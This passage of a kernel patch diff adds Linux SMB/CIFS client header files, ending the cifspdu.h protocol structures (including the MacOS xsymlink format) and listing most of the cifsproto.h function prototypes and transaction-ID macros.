++	Note that various requests implemented for NT interop such as
++		NT_TRANSACT (IOCTL) QueryReparseInfo
++	are unneeded to servers compliant with the CIFS POSIX extensions
++
++	From CIFS Unix Extensions:
++	-------------------------
++	T2 SET_PATH_INFO (SMB_SET_FILE_UNIX_LINK) for symlinks
++	T2 SET_PATH_INFO (SMB_SET_FILE_BASIC_INFO2)
++	T2 QUERY_PATH_INFO (SMB_QUERY_FILE_UNIX_LINK)
++	T2 QUERY_PATH_INFO (SMB_QUERY_FILE_UNIX_BASIC)	BB check for missing
++							inode fields
++				Actually a need QUERY_FILE_UNIX_INFO
++				since has inode num
++				BB what about a) blksize/blkbits/blocks
++							  b) i_version
++							  c) i_rdev
++							  d) notify mask?
++							  e) generation
++							  f) size_seqcount
++	T2 FIND_FIRST/FIND_NEXT FIND_FILE_UNIX
++	TRANS2_GET_DFS_REFERRAL		      - OPTIONAL but recommended
++	T2_QFS_INFO QueryDevice/AttributeInfo - OPTIONAL
++ */
++
++/* xsymlink is a symlink format (used by MacOS) that can be used
++   to save symlink info in a regular file when
++   mounted to operating systems that do not
++   support the cifs Unix extensions or EAs (for xattr
++   based symlinks).  For such a file to be recognized
++   as containing symlink data:
++
++   1) file size must be 1067,
++   2) signature must begin file data,
++   3) length field must be set to ASCII representation
++	of a number which is less than or equal to 1024,
++   4) md5 must match that of the path data */
++
++struct xsymlink {
++	/* 1067 bytes */
++	char signature[4]; /* XSym */ /* not null terminated */
++	char cr0;         /* \n */
++/* ASCII representation of length (4 bytes decimal) terminated by \n not null */
++	char length[4];
++	char cr1;         /* \n */
++/* md5 of valid subset of path ie path[0] through path[length-1] */
++	__u8 md5[32];
++	char cr2;        /* \n */
++/* if room left, then end with \n then 0x20s by convention but not required */
++	char path[1024];
++} __attribute__((packed));
++
++typedef struct file_xattr_info {
++	/* BB do we need another field for flags? BB */
++	__u32 xattr_name_len;
++	__u32 xattr_value_len;
++	char  xattr_name[];
++	/* followed by xattr_value[xattr_value_len], no pad */
++} __attribute__((packed)) FILE_XATTR_INFO; /* extended attribute info
++					      level 0x205 */
++
++/* flags for lsattr and chflags commands removed arein uapi/linux/fs.h */
++
++typedef struct file_chattr_info {
++	__le64	mask; /* list of all possible attribute bits */
++	__le64	mode; /* list of actual attribute bits on this inode */
++} __attribute__((packed)) FILE_CHATTR_INFO;  /* ext attributes
++						(chattr, chflags) level 0x206 */
++#endif 				/* POSIX */
++#endif				/* _CIFSPDU_H */
+diff --git a/fs/smb/client/cifsproto.h b/fs/smb/client/cifsproto.h
+new file mode 100644
+index 0000000000000..98513f5af3f96
+--- /dev/null
++++ b/fs/smb/client/cifsproto.h
+@@ -0,0 +1,696 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2002,2008
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#ifndef _CIFSPROTO_H
++#define _CIFSPROTO_H
++#include <linux/nls.h>
++#include "trace.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++
++struct statfs;
++struct smb_rqst;
++struct smb3_fs_context;
++
++/*
++ *****************************************************************
++ * All Prototypes
++ *****************************************************************
++ */
++
++extern struct smb_hdr *cifs_buf_get(void);
++extern void cifs_buf_release(void *);
++extern struct smb_hdr *cifs_small_buf_get(void);
++extern void cifs_small_buf_release(void *);
++extern void free_rsp_buf(int, void *);
++extern int smb_send(struct TCP_Server_Info *, struct smb_hdr *,
++			unsigned int /* length */);
++extern unsigned int _get_xid(void);
++extern void _free_xid(unsigned int);
++#define get_xid()							\
++({									\
++	unsigned int __xid = _get_xid();				\
++	cifs_dbg(FYI, "VFS: in %s as Xid: %u with uid: %d\n",		\
++		 __func__, __xid,					\
++		 from_kuid(&init_user_ns, current_fsuid()));		\
++	trace_smb3_enter(__xid, __func__);				\
++	__xid;								\
++})
++
++#define free_xid(curr_xid)						\
++do {									\
++	_free_xid(curr_xid);						\
++	cifs_dbg(FYI, "VFS: leaving %s (xid = %u) rc = %d\n",		\
++		 __func__, curr_xid, (int)rc);				\
++	if (rc)								\
++		trace_smb3_exit_err(curr_xid, __func__, (int)rc);	\
++	else								\
++		trace_smb3_exit_done(curr_xid, __func__);		\
++} while (0)
++extern int init_cifs_idmap(void);
++extern void exit_cifs_idmap(void);
++extern int init_cifs_spnego(void);
++extern void exit_cifs_spnego(void);
++extern const char *build_path_from_dentry(struct dentry *, void *);
++extern char *build_path_from_dentry_optional_prefix(struct dentry *direntry,
++						    void *page, bool prefix);
++static inline void *alloc_dentry_path(void)
++{
++	return __getname();
++}
++
++static inline void free_dentry_path(void *page)
++{
++	if (page)
++		__putname(page);
++}
++
++extern char *cifs_build_path_to_root(struct smb3_fs_context *ctx,
++				     struct cifs_sb_info *cifs_sb,
++				     struct cifs_tcon *tcon,
++				     int add_treename);
++extern char *build_wildcard_path_from_dentry(struct dentry *direntry);
++extern char *cifs_compose_mount_options(const char *sb_mountdata,
++		const char *fullpath, const struct dfs_info3_param *ref,
++		char **devname);
++extern void delete_mid(struct mid_q_entry *mid);
++extern void release_mid(struct mid_q_entry *mid);
++extern void cifs_wake_up_task(struct mid_q_entry *mid);
++extern int cifs_handle_standard(struct TCP_Server_Info *server,
++				struct mid_q_entry *mid);
++extern int smb3_parse_devname(const char *devname, struct smb3_fs_context *ctx);
++extern int smb3_parse_opt(const char *options, const char *key, char **val);
++extern bool cifs_match_ipaddr(struct sockaddr *srcaddr, struct sockaddr *rhs);
++extern int cifs_discard_remaining_data(struct TCP_Server_Info *server);
++extern int cifs_call_async(struct TCP_Server_Info *server,
++			struct smb_rqst *rqst,
++			mid_receive_t *receive, mid_callback_t *callback,
++			mid_handle_t *handle, void *cbdata, const int flags,
++			const struct cifs_credits *exist_credits);
++extern struct TCP_Server_Info *cifs_pick_channel(struct cifs_ses *ses);
++extern int cifs_send_recv(const unsigned int xid, struct cifs_ses *ses,
++			  struct TCP_Server_Info *server,
++			  struct smb_rqst *rqst, int *resp_buf_type,
++			  const int flags, struct kvec *resp_iov);
++extern int compound_send_recv(const unsigned int xid, struct cifs_ses *ses,
++			      struct TCP_Server_Info *server,
++			      const int flags, const int num_rqst,
++			      struct smb_rqst *rqst, int *resp_buf_type,
++			      struct kvec *resp_iov);
++extern int SendReceive(const unsigned int /* xid */ , struct cifs_ses *,
++			struct smb_hdr * /* input */ ,
++			struct smb_hdr * /* out */ ,
++			int * /* bytes returned */ , const int);
++extern int SendReceiveNoRsp(const unsigned int xid, struct cifs_ses *ses,
++			    char *in_buf, int flags);
++extern struct mid_q_entry *cifs_setup_request(struct cifs_ses *,
++				struct TCP_Server_Info *,
++				struct smb_rqst *);
++extern struct mid_q_entry *cifs_setup_async_request(struct TCP_Server_Info *,
++						struct smb_rqst *);
++extern int cifs_check_receive(struct mid_q_entry *mid,
++			struct TCP_Server_Info *server, bool log_error);
++extern int cifs_wait_mtu_credits(struct TCP_Server_Info *server,
++				 unsigned int size, unsigned int *num,
++				 struct cifs_credits *credits);
++extern int SendReceive2(const unsigned int /* xid */ , struct cifs_ses *,
++			struct kvec *, int /* nvec to send */,
++			int * /* type of buf returned */, const int flags,
++			struct kvec * /* resp vec */);
++extern int SendReceiveBlockingLock(const unsigned int xid,
++			struct cifs_tcon *ptcon,
++			struct smb_hdr *in_buf ,
++			struct smb_hdr *out_buf,
++			int *bytes_returned);
++void
++cifs_signal_cifsd_for_reconnect(struct TCP_Server_Info *server,
++				      bool all_channels);
++void
++cifs_mark_tcp_ses_conns_for_reconnect(struct TCP_Server_Info *server,
++				      bool mark_smb_session);
++extern int cifs_reconnect(struct TCP_Server_Info *server,
++			  bool mark_smb_session);
++extern int checkSMB(char *buf, unsigned int len, struct TCP_Server_Info *srvr);
++extern bool is_valid_oplock_break(char *, struct TCP_Server_Info *);
++extern bool backup_cred(struct cifs_sb_info *);
++extern bool is_size_safe_to_change(struct cifsInodeInfo *, __u64 eof);
++extern void cifs_update_eof(struct cifsInodeInfo *cifsi, loff_t offset,
++			    unsigned int bytes_written);
++extern struct cifsFileInfo *find_writable_file(struct cifsInodeInfo *, int);
++extern int cifs_get_writable_file(struct cifsInodeInfo *cifs_inode,
++				  int flags,
++				  struct cifsFileInfo **ret_file);
++extern int cifs_get_writable_path(struct cifs_tcon *tcon, const char *name,
++				  int flags,
++				  struct cifsFileInfo **ret_file);
++extern struct cifsFileInfo *find_readable_file(struct cifsInodeInfo *, bool);
++extern int cifs_get_readable_path(struct cifs_tcon *tcon, const char *name,
++				  struct cifsFileInfo **ret_file);
++extern unsigned int smbCalcSize(void *buf);
++extern int decode_negTokenInit(unsigned char *security_blob, int length,
++			struct TCP_Server_Info *server);
++extern int cifs_convert_address(struct sockaddr *dst, const char *src, int len);
++extern void cifs_set_port(struct sockaddr *addr, const unsigned short int port);
++extern int map_smb_to_linux_error(char *buf, bool logErr);
++extern int map_and_check_smb_error(struct mid_q_entry *mid, bool logErr);
++extern void header_assemble(struct smb_hdr *, char /* command */ ,
++			    const struct cifs_tcon *, int /* length of
++			    fixed section (word count) in two byte units */);
++extern int small_smb_init_no_tc(const int smb_cmd, const int wct,
++				struct cifs_ses *ses,
++				void **request_buf);
++extern enum securityEnum select_sectype(struct TCP_Server_Info *server,
++				enum securityEnum requested);
++extern int CIFS_SessSetup(const unsigned int xid, struct cifs_ses *ses,
++			  struct TCP_Server_Info *server,
++			  const struct nls_table *nls_cp);
++extern struct timespec64 cifs_NTtimeToUnix(__le64 utc_nanoseconds_since_1601);
++extern u64 cifs_UnixTimeToNT(struct timespec64);
++extern struct timespec64 cnvrtDosUnixTm(__le16 le_date, __le16 le_time,
++				      int offset);
++extern void cifs_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock);
++extern int cifs_get_writer(struct cifsInodeInfo *cinode);
++extern void cifs_put_writer(struct cifsInodeInfo *cinode);
++extern void cifs_done_oplock_break(struct cifsInodeInfo *cinode);
++extern int cifs_unlock_range(struct cifsFileInfo *cfile,
++			     struct file_lock *flock, const unsigned int xid);
++extern int cifs_push_mandatory_locks(struct cifsFileInfo *cfile);
++
++extern void cifs_down_write(struct rw_semaphore *sem);
++struct cifsFileInfo *cifs_new_fileinfo(struct cifs_fid *fid, struct file *file,
++				       struct tcon_link *tlink, __u32 oplock,
++				       const char *symlink_target);
++extern int cifs_posix_open(const char *full_path, struct inode **inode,
++			   struct super_block *sb, int mode,
++			   unsigned int f_flags, __u32 *oplock, __u16 *netfid,
++			   unsigned int xid);
++void cifs_fill_uniqueid(struct super_block *sb, struct cifs_fattr *fattr);
++extern void cifs_unix_basic_to_fattr(struct cifs_fattr *fattr,
++				     FILE_UNIX_BASIC_INFO *info,
++				     struct cifs_sb_info *cifs_sb);
++extern void cifs_dir_info_to_fattr(struct cifs_fattr *, FILE_DIRECTORY_INFO *,
++					struct cifs_sb_info *);
++extern int cifs_fattr_to_inode(struct inode *inode, struct cifs_fattr *fattr);
++extern struct inode *cifs_iget(struct super_block *sb,
++			       struct cifs_fattr *fattr);
++
++int cifs_get_inode_info(struct inode **inode, const char *full_path,
++			struct cifs_open_info_data *data, struct super_block *sb, int xid,
++			const struct cifs_fid *fid);
++extern int smb311_posix_get_inode_info(struct inode **pinode, const char *search_path,
++			struct super_block *sb, unsigned int xid);
++extern int cifs_get_inode_info_unix(struct inode **pinode,
++			const unsigned char *search_path,
++			struct super_block *sb, unsigned int xid);
++extern int cifs_set_file_info(struct inode *inode, struct iattr *attrs,
++			      unsigned int xid, const char *full_path, __u32 dosattr);
++extern int cifs_rename_pending_delete(const char *full_path,
++				      struct dentry *dentry,
++				      const unsigned int xid);
++extern int sid_to_id(struct cifs_sb_info *cifs_sb, struct cifs_sid *psid,
++				struct cifs_fattr *fattr, uint sidtype);
++extern int cifs_acl_to_fattr(struct cifs_sb_info *cifs_sb,
++			      struct cifs_fattr *fattr, struct inode *inode,
++			      bool get_mode_from_special_sid,
++			      const char *path, const struct cifs_fid *pfid);
++extern int id_mode_to_cifs_acl(struct inode *inode, const char *path, __u64 *pnmode,
++					kuid_t uid, kgid_t gid);
++extern struct cifs_ntsd *get_cifs_acl(struct cifs_sb_info *, struct inode *,
++				      const char *, u32 *, u32);
++extern struct cifs_ntsd *get_cifs_acl_by_fid(struct cifs_sb_info *,
++				const struct cifs_fid *, u32 *, u32);
++extern int set_cifs_acl(struct cifs_ntsd *, __u32, struct inode *,
++				const char *, int);
++extern unsigned int setup_authusers_ACE(struct cifs_ace *pace);
++extern unsigned int setup_special_mode_ACE(struct cifs_ace *pace, __u64 nmode);
++extern unsigned int setup_special_user_owner_ACE(struct cifs_ace *pace);
++
++extern void dequeue_mid(struct mid_q_entry *mid, bool malformed);
++extern int cifs_read_from_socket(struct TCP_Server_Info *server, char *buf,
++			         unsigned int to_read);
++extern ssize_t cifs_discard_from_socket(struct TCP_Server_Info *server,
++					size_t to_read);
++extern int cifs_read_page_from_socket(struct TCP_Server_Info *server,
++					struct page *page,
++					unsigned int page_offset,
++					unsigned int to_read);
++extern int cifs_setup_cifs_sb(struct cifs_sb_info *cifs_sb);
++extern int cifs_match_super(struct super_block *, void *);
++extern int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx);
++extern void cifs_umount(struct cifs_sb_info *);
++extern void cifs_mark_open_files_invalid(struct cifs_tcon *tcon);
++extern void cifs_reopen_persistent_handles(struct cifs_tcon *tcon);
++
++extern bool cifs_find_lock_conflict(struct cifsFileInfo *cfile, __u64 offset,
++				    __u64 length, __u8 type, __u16 flags,
++				    struct cifsLockInfo **conf_lock,
++				    int rw_check);
++extern void cifs_add_pending_open(struct cifs_fid *fid,
++				  struct tcon_link *tlink,
++				  struct cifs_pending_open *open);
++extern void cifs_add_pending_open_locked(struct cifs_fid *fid,
++					 struct tcon_link *tlink,
++					 struct cifs_pending_open *open);
++extern void cifs_del_pending_open(struct cifs_pending_open *open);
++
++extern bool cifs_is_deferred_close(struct cifsFileInfo *cfile,
++				struct cifs_deferred_close **dclose);
++
++extern void cifs_add_deferred_close(struct cifsFileInfo *cfile,
++				struct cifs_deferred_close *dclose);
++
++extern void cifs_del_deferred_close(struct cifsFileInfo *cfile);
++
++extern void cifs_close_deferred_file(struct cifsInodeInfo *cifs_inode);
++
++extern void cifs_close_all_deferred_files(struct cifs_tcon *cifs_tcon);
++
++extern void cifs_close_deferred_file_under_dentry(struct cifs_tcon *cifs_tcon,
++				const char *path);
++extern struct TCP_Server_Info *
++cifs_get_tcp_session(struct smb3_fs_context *ctx,
++		     struct TCP_Server_Info *primary_server);
++extern void cifs_put_tcp_session(struct TCP_Server_Info *server,
++				 int from_reconnect);
++extern void cifs_put_tcon(struct cifs_tcon *tcon);
++
++#if IS_ENABLED(CONFIG_CIFS_DFS_UPCALL)
++extern void cifs_dfs_release_automount_timer(void);
++#else /* ! IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) */
++#define cifs_dfs_release_automount_timer()	do { } while (0)
++#endif /* ! IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) */
++
++void cifs_proc_init(void);
++void cifs_proc_clean(void);
++
++extern void cifs_move_llist(struct list_head *source, struct list_head *dest);
++extern void cifs_free_llist(struct list_head *llist);
++extern void cifs_del_lock_waiters(struct cifsLockInfo *lock);
++
++extern int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon,
++			     const struct nls_table *nlsc);
++
++extern int cifs_negotiate_protocol(const unsigned int xid,
++				   struct cifs_ses *ses,
++				   struct TCP_Server_Info *server);
++extern int cifs_setup_session(const unsigned int xid, struct cifs_ses *ses,
++			      struct TCP_Server_Info *server,
++			      struct nls_table *nls_info);
++extern int cifs_enable_signing(struct TCP_Server_Info *server, bool mnt_sign_required);
++extern int CIFSSMBNegotiate(const unsigned int xid,
++			    struct cifs_ses *ses,
++			    struct TCP_Server_Info *server);
++
++extern int CIFSTCon(const unsigned int xid, struct cifs_ses *ses,
++		    const char *tree, struct cifs_tcon *tcon,
++		    const struct nls_table *);
++
++extern int CIFSFindFirst(const unsigned int xid, struct cifs_tcon *tcon,
++		const char *searchName, struct cifs_sb_info *cifs_sb,
++		__u16 *searchHandle, __u16 search_flags,
++		struct cifs_search_info *psrch_inf,
++		bool msearch);
++
++extern int CIFSFindNext(const unsigned int xid, struct cifs_tcon *tcon,
++		__u16 searchHandle, __u16 search_flags,
++		struct cifs_search_info *psrch_inf);
++
++extern int CIFSFindClose(const unsigned int xid, struct cifs_tcon *tcon,
++			const __u16 search_handle);
++
++extern int CIFSSMBQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			u16 netfid, FILE_ALL_INFO *pFindData);
++extern int CIFSSMBQPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			    const char *search_Name, FILE_ALL_INFO *data,
++			    int legacy /* whether to use old info level */,
++			    const struct nls_table *nls_codepage, int remap);
++extern int SMBQueryInformation(const unsigned int xid, struct cifs_tcon *tcon,
++			       const char *search_name, FILE_ALL_INFO *data,
++			       const struct nls_table *nls_codepage, int remap);
++
++extern int CIFSSMBUnixQFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			u16 netfid, FILE_UNIX_BASIC_INFO *pFindData);
++extern int CIFSSMBUnixQPathInfo(const unsigned int xid,
++			struct cifs_tcon *tcon,
++			const unsigned char *searchName,
++			FILE_UNIX_BASIC_INFO *pFindData,
++			const struct nls_table *nls_codepage, int remap);
++
++extern int CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses,
++			   const char *search_name,
++			   struct dfs_info3_param **target_nodes,
++			   unsigned int *num_of_nodes,
++			   const struct nls_table *nls_codepage, int remap);
++
++extern int parse_dfs_referrals(struct get_dfs_referral_rsp *rsp, u32 rsp_size,
++			       unsigned int *num_of_nodes,
++			       struct dfs_info3_param **target_nodes,
++			       const struct nls_table *nls_codepage, int remap,
++			       const char *searchName, bool is_unicode);
++extern void reset_cifs_unix_caps(unsigned int xid, struct cifs_tcon *tcon,
++				 struct cifs_sb_info *cifs_sb,
++				 struct smb3_fs_context *ctx);
++extern int CIFSSMBQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			struct kstatfs *FSData);
++extern int SMBOldQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			struct kstatfs *FSData);
++extern int CIFSSMBSetFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			__u64 cap);
++
++extern int CIFSSMBQFSAttributeInfo(const unsigned int xid,
++			struct cifs_tcon *tcon);
++extern int CIFSSMBQFSDeviceInfo(const unsigned int xid, struct cifs_tcon *tcon);
++extern int CIFSSMBQFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon);
++extern int CIFSSMBQFSPosixInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			struct kstatfs *FSData);
++
++extern int CIFSSMBSetPathInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			const char *fileName, const FILE_BASIC_INFO *data,
++			const struct nls_table *nls_codepage,
++			struct cifs_sb_info *cifs_sb);
++extern int CIFSSMBSetFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
++			const FILE_BASIC_INFO *data, __u16 fid,
++			__u32 pid_of_opener);
++extern int CIFSSMBSetFileDisposition(const unsigned int xid,
++				     struct cifs_tcon *tcon,
++				     bool delete_file, __u16 fid,
++				     __u32 pid_of_opener);
++extern int CIFSSMBSetEOF(const unsigned int xid, struct cifs_tcon *tcon,
++			 const char *file_name, __u64 size,
++			 struct cifs_sb_info *cifs_sb, bool set_allocation);
++extern int CIFSSMBSetFileSize(const unsigned int xid, struct cifs_tcon *tcon,
++			      struct cifsFileInfo *cfile, __u64 size,
++			      bool set_allocation);
++
++struct cifs_unix_set_info_args {
++	__u64	ctime;
++	__u64	atime;
++	__u64	mtime;
++	__u64	mode;
++	kuid_t	uid;
++	kgid_t	gid;
++	dev_t	device;
++};
++
++extern int CIFSSMBUnixSetFileInfo(const unsigned int xid,
++				  struct cifs_tcon *tcon,
++				  const struct cifs_unix_set_info_args *args,
++				  u16 fid, u32 pid_of_opener);
++
++extern int CIFSSMBUnixSetPathInfo(const unsigned int xid,
++				  struct cifs_tcon *tcon, const char *file_name,
++				  const struct cifs_unix_set_info_args *args,
++				  const struct nls_table *nls_codepage,
++				  int remap);
++
++extern int CIFSSMBMkDir(const unsigned int xid, struct inode *inode,
++			umode_t mode, struct cifs_tcon *tcon,
++			const char *name, struct cifs_sb_info *cifs_sb);
++extern int CIFSSMBRmDir(const unsigned int xid, struct cifs_tcon *tcon,
++			const char *name, struct cifs_sb_info *cifs_sb);
++extern int CIFSPOSIXDelFile(const unsigned int xid, struct cifs_tcon *tcon,
++			const char *name, __u16 type,
++			const struct nls_table *nls_codepage,
++			int remap_special_chars);
++extern int CIFSSMBDelFile(const unsigned int xid, struct cifs_tcon *tcon,
++			  const char *name, struct cifs_sb_info *cifs_sb);
++extern int CIFSSMBRename(const unsigned int xid, struct cifs_tcon *tcon,
++			 const char *from_name, const char *to_name,
++			 struct cifs_sb_info *cifs_sb);
++extern int CIFSSMBRenameOpenFile(const unsigned int xid, struct cifs_tcon *tcon,
++				 int netfid, const char *target_name,
++				 const struct nls_table *nls_codepage,
++				 int remap_special_chars);
++extern int CIFSCreateHardLink(const unsigned int xid, struct cifs_tcon *tcon,
++			      const char *from_name, const char *to_name,
++			      struct cifs_sb_info *cifs_sb);
++extern int CIFSUnixCreateHardLink(const unsigned int xid,
++			struct cifs_tcon *tcon,
++			const char *fromName, const char *toName,
++			const struct nls_table *nls_codepage,
++			int remap_special_chars);
++extern int CIFSUnixCreateSymLink(const unsigned int xid,
++			struct cifs_tcon *tcon,
++			const char *fromName, const char *toName,
++			const struct nls_table *nls_codepage, int remap);
++extern int CIFSSMBUnixQuerySymLink(const unsigned int xid,
++			struct cifs_tcon *tcon,
++			const unsigned char *searchName, char **syminfo,
++			const struct nls_table *nls_codepage, int remap);
++extern int CIFSSMBQuerySymLink(const unsigned int xid, struct cifs_tcon *tcon,
++			       __u16 fid, char **symlinkinfo,
++			       const struct nls_table *nls_codepage);
++extern int CIFSSMB_set_compression(const unsigned int xid,
++				   struct cifs_tcon *tcon, __u16 fid);
++extern int CIFS_open(const unsigned int xid, struct cifs_open_parms *oparms,
++		     int *oplock, FILE_ALL_INFO *buf);
++extern int SMBLegacyOpen(const unsigned int xid, struct cifs_tcon *tcon,
++			const char *fileName, const int disposition,
++			const int access_flags, const int omode,
++			__u16 *netfid, int *pOplock, FILE_ALL_INFO *,
++			const struct nls_table *nls_codepage, int remap);
++extern int CIFSPOSIXCreate(const unsigned int xid, struct cifs_tcon *tcon,
++			u32 posix_flags, __u64 mode, __u16 *netfid,
++			FILE_UNIX_BASIC_INFO *pRetData,
++			__u32 *pOplock, const char *name,
++			const struct nls_table *nls_codepage, int remap);
++extern int CIFSSMBClose(const unsigned int xid, struct cifs_tcon *tcon,
++			const int smb_file_id);
++
++extern int CIFSSMBFlush(const unsigned int xid, struct cifs_tcon *tcon,
++			const int smb_file_id);
++
++extern int CIFSSMBRead(const unsigned int xid, struct cifs_io_parms *io_parms,
++			unsigned int *nbytes, char **buf,
++			int *return_buf_type);
++extern int CIFSSMBWrite(const unsigned int xid, struct cifs_io_parms *io_parms,
++			unsigned int *nbytes, const char *buf);
++extern int CIFSSMBWrite2(const unsigned int xid, struct cifs_io_parms *io_parms,
++			unsigned int *nbytes, struct kvec *iov, const int nvec);
++extern int CIFSGetSrvInodeNumber(const unsigned int xid, struct cifs_tcon *tcon,
++				 const char *search_name, __u64 *inode_number,
++				 const struct nls_table *nls_codepage,
++				 int remap);
++
++extern int cifs_lockv(const unsigned int xid, struct cifs_tcon *tcon,
++		      const __u16 netfid, const __u8 lock_type,
++		      const __u32 num_unlock, const __u32 num_lock,
++		      LOCKING_ANDX_RANGE *buf);
++extern int CIFSSMBLock(const unsigned int xid, struct cifs_tcon *tcon,
++			const __u16 netfid, const __u32 netpid, const __u64 len,
++			const __u64 offset, const __u32 numUnlock,
++			const __u32 numLock, const __u8 lockType,
++			const bool waitFlag, const __u8 oplock_level);
++extern int CIFSSMBPosixLock(const unsigned int xid, struct cifs_tcon *tcon,
++			const __u16 smb_file_id, const __u32 netpid,
++			const loff_t start_offset, const __u64 len,
++			struct file_lock *, const __u16 lock_type,
++			const bool waitFlag);
++extern int CIFSSMBTDis(const unsigned int xid, struct cifs_tcon *tcon);
++extern int CIFSSMBEcho(struct TCP_Server_Info *server);
++extern int CIFSSMBLogoff(const unsigned int xid, struct cifs_ses *ses);
++
++extern struct cifs_ses *sesInfoAlloc(void);
++extern void sesInfoFree(struct cifs_ses *);
++extern struct cifs_tcon *tconInfoAlloc(void);
++extern void tconInfoFree(struct cifs_tcon *);
++
++extern int cifs_sign_rqst(struct smb_rqst *rqst, struct TCP_Server_Info *server,
++		   __u32 *pexpected_response_sequence_number);
++extern int cifs_sign_smbv(struct kvec *iov, int n_vec, struct TCP_Server_Info *,
++			  __u32 *);
++extern int cifs_sign_smb(struct smb_hdr *, struct TCP_Server_Info *, __u32 *);
++extern int cifs_verify_signature(struct smb_rqst *rqst,
++				 struct TCP_Server_Info *server,
++				__u32 expected_sequence_number);
++extern int setup_ntlmv2_rsp(struct cifs_ses *, const struct nls_table *);
++extern void cifs_crypto_secmech_release(struct TCP_Server_Info *server);
++extern int calc_seckey(struct cifs_ses *);
++extern int generate_smb30signingkey(struct cifs_ses *ses,
++				    struct TCP_Server_Info *server);
++extern int generate_smb311signingkey(struct cifs_ses *ses,
++				     struct TCP_Server_Info *server);
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++extern int CIFSSMBCopy(unsigned int xid,
++			struct cifs_tcon *source_tcon,
++			const char *fromName,
++			const __u16 target_tid,
++			const char *toName, const int flags,
++			const struct nls_table *nls_codepage,
++			int remap_special_chars);
++extern ssize_t CIFSSMBQAllEAs(const unsigned int xid, struct cifs_tcon *tcon,
++			const unsigned char *searchName,
++			const unsigned char *ea_name, char *EAData,
++			size_t bufsize, struct cifs_sb_info *cifs_sb);
++extern int CIFSSMBSetEA(const unsigned int xid, struct cifs_tcon *tcon,
++		const char *fileName, const char *ea_name,
++		const void *ea_value, const __u16 ea_value_len,
++		const struct nls_table *nls_codepage,
++		struct cifs_sb_info *cifs_sb);
++extern int CIFSSMBGetCIFSACL(const unsigned int xid, struct cifs_tcon *tcon,
++			__u16 fid, struct cifs_ntsd **acl_inf, __u32 *buflen);
++extern int CIFSSMBSetCIFSACL(const unsigned int, struct cifs_tcon *, __u16,
++			struct cifs_ntsd *, __u32, int);
++extern int CIFSSMBGetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
++		const unsigned char *searchName,
++		char *acl_inf, const int buflen, const int acl_type,
++		const struct nls_table *nls_codepage, int remap_special_chars);
++extern int CIFSSMBSetPosixACL(const unsigned int xid, struct cifs_tcon *tcon,
++		const unsigned char *fileName,
++		const char *local_acl, const int buflen, const int acl_type,
++		const struct nls_table *nls_codepage, int remap_special_chars);
++extern int CIFSGetExtAttr(const unsigned int xid, struct cifs_tcon *tcon,
++			const int netfid, __u64 *pExtAttrBits, __u64 *pMask);
++#endif /* CIFS_ALLOW_INSECURE_LEGACY */
++extern void cifs_autodisable_serverino(struct cifs_sb_info *cifs_sb);
++extern bool couldbe_mf_symlink(const struct cifs_fattr *fattr);
++extern int check_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++			      struct cifs_sb_info *cifs_sb,
++			      struct cifs_fattr *fattr,
++			      const unsigned char *path);
++extern int E_md4hash(const unsigned char *passwd, unsigned char *p16,
++			const struct nls_table *codepage);
++
++extern int
++cifs_setup_volume_info(struct smb3_fs_context *ctx, const char *mntopts, const char *devname);
++
++extern struct TCP_Server_Info *
++cifs_find_tcp_session(struct smb3_fs_context *ctx);
++
++extern void cifs_put_smb_ses(struct cifs_ses *ses);
++
++extern struct cifs_ses *
++cifs_get_smb_ses(struct TCP_Server_Info *server, struct smb3_fs_context *ctx);
++
++void cifs_readdata_release(struct kref *refcount);
++int cifs_async_readv(struct cifs_readdata *rdata);
++int cifs_readv_receive(struct TCP_Server_Info *server, struct mid_q_entry *mid);
++
++int cifs_async_writev(struct cifs_writedata *wdata,
++		      void (*release)(struct kref *kref));
++void cifs_writev_complete(struct work_struct *work);
++struct cifs_writedata *cifs_writedata_alloc(unsigned int nr_pages,
++						work_func_t complete);
++struct cifs_writedata *cifs_writedata_direct_alloc(struct page **pages,
++						work_func_t complete);
++void cifs_writedata_release(struct kref *refcount);
++int cifs_query_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++			  struct cifs_sb_info *cifs_sb,
++			  const unsigned char *path, char *pbuf,
++			  unsigned int *pbytes_read);
++int cifs_create_mf_symlink(unsigned int xid, struct cifs_tcon *tcon,
++			   struct cifs_sb_info *cifs_sb,
++			   const unsigned char *path, char *pbuf,
++			   unsigned int *pbytes_written);
++int __cifs_calc_signature(struct smb_rqst *rqst,
++			struct TCP_Server_Info *server, char *signature,
++			struct shash_desc *shash);
++enum securityEnum cifs_select_sectype(struct TCP_Server_Info *,
++					enum securityEnum);
++struct cifs_aio_ctx *cifs_aio_ctx_alloc(void);
++void cifs_aio_ctx_release(struct kref *refcount);
++int setup_aio_ctx_iter(struct cifs_aio_ctx *ctx, struct iov_iter *iter, int rw);
++
++int cifs_alloc_hash(const char *name, struct shash_desc **sdesc);
++void cifs_free_hash(struct shash_desc **sdesc);
++
++void rqst_page_get_length(const struct smb_rqst *rqst, unsigned int page,
++			  unsigned int *len, unsigned int *offset);
++struct cifs_chan *
++cifs_ses_find_chan(struct cifs_ses *ses, struct TCP_Server_Info *server);
++int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses);
